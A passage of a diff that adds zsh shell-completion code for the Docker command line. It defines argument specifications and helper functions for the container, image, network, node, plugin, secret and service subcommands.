(prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rename) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):old name:__docker_complete_containers" \ + "($help -):new name: " && ret=0 + ;; + (restart) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ + "($help -)*:containers:__docker_complete_containers_ids" && ret=0 + ;; + (rm) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force removal]" \ + "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \ + "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \ + "($help -)*:containers:->values" && ret=0 + case $state in + (values) + if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then + __docker_complete_containers && ret=0 + else + __docker_complete_stopped_containers && ret=0 + fi + ;; + esac + ;; + (run) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_create_run \ + $opts_create_run_update \ + $opts_attach_exec_run_start \ + "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \ + "($help)--health-cmd=[Command to run to check health]:command: " \ + "($help)--health-interval=[Time between running the check]:time: " \ + "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \ + "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \ + "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \ + "($help)--rm[Remove intermediate containers when it exits]" \ + "($help)--runtime=[Name of the runtime to 
be used for that container]:runtime:__docker_complete_runtimes" \ + "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \ + "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \ + "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \ + "($help -): :__docker_complete_images" \ + "($help -):command: _command_names -e" \ + "($help -)*::arguments: _normal" && ret=0 + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + (storage-opt) + if compset -P "*="; then + _message "value" && ret=0 + else + opts=('size') + _describe -t filter-opts "storage options" opts -qS "=" && ret=0 + fi + ;; + esac + ;; + (start) + _arguments $(__docker_arguments) \ + $opts_help \ + $opts_attach_exec_run_start \ + "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \ + "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \ + "($help -)*:containers:__docker_complete_stopped_containers" && ret=0 + ;; + (stats) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \ + "($help)--format=[Pretty-print images using a Go template]:template: " \ + "($help)--no-stream[Disable streaming stats and only pull the first result]" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (stop) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (top) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)1:containers:__docker_complete_running_containers" \ + "($help -)*:: 
:->ps-arguments" && ret=0 + case $state in + (ps-arguments) + _ps && ret=0 + ;; + esac + ;; + (update) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + opts_create_run_update \ + "($help -)*: :->values" && ret=0 + case $state in + (values) + if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then + __docker_complete_stopped_containers && ret=0 + else + __docker_complete_containers && ret=0 + fi + ;; + esac + ;; + (wait) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:containers:__docker_complete_running_containers" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 + ;; + esac + + return ret +} + +# EO container + +# BO image + +__docker_image_commands() { + local -a _docker_image_subcommands + _docker_image_subcommands=( + "build:Build an image from a Dockerfile" + "history:Show the history of an image" + "import:Import the contents from a tarball to create a filesystem image" + "inspect:Display detailed information on one or more images" + "load:Load an image from a tar archive or STDIN" + "ls:List images" + "prune:Remove unused images" + "pull:Pull an image or a repository from a registry" + "push:Push an image or a repository to a registry" + "rm:Remove one or more images" + "save:Save one or more images to a tar archive (streamed to STDOUT by default)" + "tag:Tag an image into a repository" + ) + _describe -t docker-image-commands "docker image command" _docker_image_subcommands +} + +__docker_image_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (build) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--build-arg=[Build-time variables]:=: " \ + "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \ + "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU 
shares:(0 10 100 200 500 800 1000)" \ + "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \ + "($help)--compress[Compress the build context using gzip]" \ + "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \ + "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \ + "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \ + "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \ + "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \ + "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \ + "($help)--disable-content-trust[Skip image verification]" \ + "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \ + "($help)--force-rm[Always remove intermediate containers]" \ + "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \ + "($help)*--label=[Set metadata for an image]:label=value: " \ + "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \ + "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \ + "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \ + "($help)--no-cache[Do not use cache when building the image]" \ + "($help)--pull[Attempt to pull a newer version of the image]" \ + "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \ + "($help)--rm[Remove intermediate containers after a successful build]" \ + "($help)*--shm-size=[Size of '/dev/shm' (format is '')]:shm size: " \ + "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \ + "($help)*--ulimit=[ulimit options]:ulimit: " \ + "($help)--userns=[Container user namespace]:user namespace:(host)" \ + "($help -):path or URL:_directories" && ret=0 + ;; + (history) + _arguments $(__docker_arguments) 
\ + $opts_help \ + "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (import) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \ + "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \ + "($help -):URL:(- http:// file://)" \ + "($help -): :__docker_complete_repositories_with_tags" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)*:images:__docker_complete_images" && ret=0 + ;; + (load) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \ + "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0 + ;; + (ls|list) + local state + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Show all images]" \ + "($help)--digests[Show digests]" \ + "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print images using a Go template]:template: " \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \ + "($help -): :__docker_complete_repositories" && ret=0 + case $state in + (filter-options) + __docker_complete_images_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not 
prompt for confirmation]" && ret=0 + ;; + (pull) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \ + "($help)--disable-content-trust[Skip image verification]" \ + "($help -):name:__docker_search" && ret=0 + ;; + (push) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--disable-content-trust[Skip image signing]" \ + "($help -): :__docker_complete_images" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force removal]" \ + "($help)--no-prune[Do not delete untagged parents]" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (save) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \ + "($help -)*: :__docker_complete_images" && ret=0 + ;; + (tag) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -):source:__docker_complete_images"\ + "($help -):destination:__docker_complete_repositories_with_tags" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0 + ;; + esac + + return ret +} + +# EO image + +# BO network + +__docker_network_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (driver) + __docker_complete_info_plugins Network && ret=0 + ;; + (id) + __docker_complete_networks_ids && ret=0 + ;; + (name) + __docker_complete_networks_names && ret=0 + ;; + (type) + type_opts=('builtin' 'custom') + _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('driver' 'id' 'label' 'name' 'type') + _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_get_networks() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines networks + + type=$1; shift + + 
lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Network ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" + networks=($networks $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" + s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}" + networks=($networks $s) + done + fi + + _describe -t networks-list "networks" networks "$@" && ret=0 + return ret +} + +__docker_complete_networks() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks all "$@" +} + +__docker_complete_networks_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks ids "$@" +} + +__docker_complete_networks_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_get_networks names "$@" +} + +__docker_network_commands() { + local -a _docker_network_subcommands + _docker_network_subcommands=( + "connect:Connect a container to a network" + "create:Creates a new network with a name specified by the user" + "disconnect:Disconnects a container from a network" + "inspect:Displays detailed information on a network" + "ls:Lists all the networks created by the user" + "prune:Remove all unused networks" + "rm:Deletes one or more networks" + ) + _describe -t docker-network-commands "docker network 
command" _docker_network_subcommands +} + +__docker_network_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (connect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--alias=[Add network-scoped alias for the container]:alias: " \ + "($help)--ip=[Container IPv4 address]:IPv4: " \ + "($help)--ip6=[Container IPv6 address]:IPv6: " \ + "($help)*--link=[Add a link to another container]:link:->link" \ + "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \ + "($help -)1:network:__docker_complete_networks" \ + "($help -)2:containers:__docker_complete_containers" && ret=0 + + case $state in + (link) + if compset -P "*:"; then + _wanted alias expl "Alias" compadd -E "" && ret=0 + else + __docker_complete_running_containers -qS ":" && ret=0 + fi + ;; + esac + ;; + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)--attachable[Enable manual container attachment]" \ + "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \ + "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \ + "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \ + "($help)--internal[Restricts external access to the network]" \ + "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \ + "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \ + "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \ + "($help)--ipv6[Enable IPv6 networking]" \ + "($help)*--label=[Set metadata on a network]:label=value: " \ + "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \ + "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \ + "($help -)1:Network Name: " && ret=0 + ;; + (disconnect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help 
-)1:network:__docker_complete_networks" \ + "($help -)2:containers:__docker_complete_containers" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help -)*:network:__docker_complete_networks" && ret=0 + ;; + (ls) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--no-trunc[Do not truncate the output]" \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--format=[Pretty-print networks using a Go template]:template: " \ + "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0 + case $state in + (filter-options) + __docker_network_complete_ls_filters && ret=0 + ;; + esac + ;; + (prune) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ + "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 + ;; + (rm) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:network:__docker_complete_networks" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 + ;; + esac + + return ret +} + +# EO network + +# BO node + +__docker_node_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (id) + __docker_complete_nodes_ids && ret=0 + ;; + (membership) + membership_opts=('accepted' 'pending' 'rejected') + _describe -t membership-opts "membership options" membership_opts && ret=0 + ;; + (name) + __docker_complete_nodes_names && ret=0 + ;; + (role) + role_opts=('manager' 'worker') + _describe -t role-opts "role options" role_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'membership' 'name' 'role') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + 
+__docker_node_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_nodes() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines nodes args + + type=$1; shift + filter=$1; shift + [[ $filter != "none" ]] && args=("-f $filter") + + lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}}) + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Node ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + nodes=($nodes $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + nodes=($nodes $s) + done + fi + + _describe -t nodes-list "nodes" nodes "$@" && ret=0 + return ret +} + +__docker_complete_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all none "$@" +} + +__docker_complete_nodes_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes ids none "$@" +} + +__docker_complete_nodes_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes names none "$@" +} + +__docker_complete_pending_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "membership=pending" "$@" +} + 
+__docker_complete_manager_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "role=manager" "$@" +} + +__docker_complete_worker_nodes() { + [[ $PREFIX = -* ]] && return 1 + __docker_nodes all "role=worker" "$@" +} + +__docker_node_commands() { + local -a _docker_node_subcommands + _docker_node_subcommands=( + "demote:Demote a node as manager in the swarm" + "inspect:Display detailed information on one or more nodes" + "ls:List nodes in the swarm" + "promote:Promote a node as manager in the swarm" + "rm:Remove one or more nodes from the swarm" + "ps:List tasks running on one or more nodes, defaults to current node" + "update:Update a node" + ) + _describe -t docker-node-commands "docker node command" _docker_node_subcommands +} + +__docker_node_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \ + "($help -)*:node:__docker_complete_pending_nodes" && ret=0 + ;; + (demote) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:node:__docker_complete_manager_nodes" && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ + "($help)--pretty[Print the information in a human friendly format]" \ + "($help -)*:node:__docker_complete_nodes" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + case $state in + (filter-options) + __docker_node_complete_ls_filters && ret=0 + ;; + esac + ;; + (promote) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:node:__docker_complete_worker_nodes" && ret=0 + ;; + (ps) 
+ _arguments $(__docker_arguments) \ + $opts_help \ + "($help -a --all)"{-a,--all}"[Display all instances]" \ + "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ + "($help)--no-resolve[Do not map IDs to Names]" \ + "($help)--no-trunc[Do not truncate output]" \ + "($help -)*:node:__docker_complete_nodes" && ret=0 + case $state in + (filter-options) + __docker_node_complete_ps_filters && ret=0 + ;; + esac + ;; + (update) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help)--availability=[Availability of the node]:availability:(active pause drain)" \ + "($help)*--label-add=[Add or update a node label]:key=value: " \ + "($help)*--label-rm=[Remove a node label if exists]:label: " \ + "($help)--role=[Role of the node]:role:(manager worker)" \ + "($help -)1:node:__docker_complete_nodes" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0 + ;; + esac + + return ret +} + +# EO node + +# BO plugin + +__docker_complete_plugins() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines plugins + + lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Name + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}" + plugins=($plugins $s) + done + + _describe -t plugins-list "plugins" plugins "$@" && ret=0 + return ret +} + +__docker_plugin_commands() { + local -a _docker_plugin_subcommands + _docker_plugin_subcommands=( + "disable:Disable a 
plugin"
+        "enable:Enable a plugin"
+        "inspect:Return low-level information about a plugin"
+        "install:Install a plugin"
+        "ls:List plugins"
+        "push:Push a plugin"
+        "rm:Remove a plugin"
+        "set:Change settings for a plugin"
+    )
+    _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands
+}
+
+# Dispatch completion for the `docker plugin` subcommand found in $words[1].
+__docker_plugin_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (disable|enable|inspect|ls|push|rm)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:plugin:__docker_complete_plugins" && ret=0
+            ;;
+        (install)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--alias=[Local name for plugin]:alias: " \
+                "($help -)1:plugin:__docker_complete_plugins" && ret=0
+            ;;
+        (set)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:plugin:__docker_complete_plugins" \
+                "($help -)*:key=value: " && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO plugin
+
+# BO secret
+
+# List secret IDs and/or names by scraping `docker secret ls` output.
+# $1 selects which columns to offer: ids, names, or all.
+__docker_secrets() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s type
+
+    declare -a lines secrets
+
+    type=$1; shift
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[ID]},${end[ID]}]%% ##}"
+            secrets=($secrets $s)
+        done
+    fi
+
+    # Names
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            
s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + secrets=($secrets $s) + done + fi + + _describe -t secrets-list "secrets" secrets "$@" && ret=0 + return ret +} + +__docker_complete_secrets() { + [[ $PREFIX = -* ]] && return 1 + __docker_secrets all "$@" +} + +__docker_secret_commands() { + local -a _docker_secret_subcommands + _docker_secret_subcommands=( + "create:Create a secret using stdin as content" + "inspect:Display detailed information on one or more secrets" + "ls:List secrets" + "rm:Remove one or more secrets" + ) + _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands +} + +__docker_secret_subcommand() { + local -a _command_args opts_help + local expl help="--help" + integer ret=1 + + opts_help=("(: -)--help[Print usage]") + + case "$words[1]" in + (create) + _arguments $(__docker_arguments) -A '-*' \ + $opts_help \ + "($help)*"{-l=,--label=}"[Secret labels]:label: " \ + "($help -):secret: " && ret=0 + ;; + (inspect) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \ + "($help -)*:secret:__docker_complete_secrets" && ret=0 + ;; + (ls|list) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 + ;; + (rm|remove) + _arguments $(__docker_arguments) \ + $opts_help \ + "($help -)*:secret:__docker_complete_secrets" && ret=0 + ;; + (help) + _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0 + ;; + esac + + return ret +} + +# EO secret + +# BO service + +__docker_service_complete_ls_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (id) + __docker_complete_services_ids && ret=0 + ;; + (name) + __docker_complete_services_names && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('id' 'label' 'name') + _describe -t filter-opts "filter options" 
opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_service_complete_ps_filters() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + + if compset -P '*='; then + case "${${words[-1]%=*}#*=}" in + (desired-state) + state_opts=('accepted' 'running') + _describe -t state-opts "desired state options" state_opts && ret=0 + ;; + *) + _message 'value' && ret=0 + ;; + esac + else + opts=('desired-state' 'id' 'label' 'name') + _describe -t filter-opts "filter options" opts -qS "=" && ret=0 + fi + + return ret +} + +__docker_services() { + [[ $PREFIX = -* ]] && return 1 + integer ret=1 + local line s + declare -a lines services + + type=$1; shift + + lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}}) + + # Parse header line to find columns + local i=1 j=1 k header=${lines[1]} + declare -A begin end + while (( j < ${#header} - 1 )); do + i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) + j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) + k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) + begin[${header[$i,$((j-1))]}]=$i + end[${header[$i,$((j-1))]}]=$k + done + end[${header[$i,$((j-1))]}]=-1 + lines=(${lines[2,-1]}) + + # Service ID + if [[ $type = (ids|all) ]]; then + for line in $lines; do + s="${line[${begin[ID]},${end[ID]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" + services=($services $s) + done + fi + + # Names + if [[ $type = (names|all) ]]; then + for line in $lines; do + s="${line[${begin[NAME]},${end[NAME]}]%% ##}" + s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" + services=($services $s) + done + fi + + _describe -t services-list "services" services "$@" && ret=0 + return ret +} + +__docker_complete_services() { + [[ $PREFIX = -* ]] && return 1 + __docker_services all "$@" +} + +__docker_complete_services_ids() { + [[ $PREFIX = -* ]] && return 1 + __docker_services ids "$@" +} + +__docker_complete_services_names() { + [[ $PREFIX = -* ]] && return 1 + __docker_services names "$@" 
+}
+
+__docker_service_commands() {
+    local -a _docker_service_subcommands
+    _docker_service_subcommands=(
+        "create:Create a new service"
+        "inspect:Display detailed information on one or more services"
+        "ls:List services"
+        "rm:Remove one or more services"
+        "scale:Scale one or multiple replicated services"
+        "ps:List the tasks of a service"
+        "update:Update a service"
+    )
+    _describe -t docker-service-commands "docker service command" _docker_service_subcommands
+}
+
+# Dispatch completion for the `docker service` subcommand found in $words[1].
+# opts_create_update holds the option specs shared by `create` and `update`.
+__docker_service_subcommand() {
+    local -a _command_args opts_help opts_create_update
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+    opts_create_update=(
+        "($help)*--constraint=[Placement constraints]:constraint: "
+        "($help)--endpoint-mode=[Endpoint mode (vip or dnsrr)]:mode:(dnsrr vip)"
+        "($help)*"{-e=,--env=}"[Set environment variables]:env: "
+        "($help)--health-cmd=[Command to run to check health]:command: "
+        "($help)--health-interval=[Time between running the check]:time: "
+        "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)"
+        "($help)--health-timeout=[Maximum time to allow one check to run]:time: "
+        "($help)--hostname=[Service container hostname]:hostname: "
+        "($help)*--label=[Service labels]:label: "
+        "($help)--limit-cpu=[Limit CPUs]:value: "
+        "($help)--limit-memory=[Limit Memory]:value: "
